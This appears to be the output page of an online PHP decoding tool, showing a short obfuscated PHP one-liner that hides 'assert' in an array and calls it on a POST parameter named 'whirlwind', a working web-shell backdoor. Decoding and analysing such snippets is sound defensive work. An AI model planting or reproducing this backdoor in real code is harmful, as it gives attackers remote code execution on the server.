Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>..
Decoded Output download
<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
Did this file decode correctly?
Original Code
<?php $item['wind'] = 'assert';$array[] = $item;$array[0]['wind']($_POST['whirlwind']);?>
Function Calls
None |
Stats
MD5 | 0a8f388d3b129cc6d89aa09000dec25e |
Eval Count | 0 |
Decode Time | 115 ms |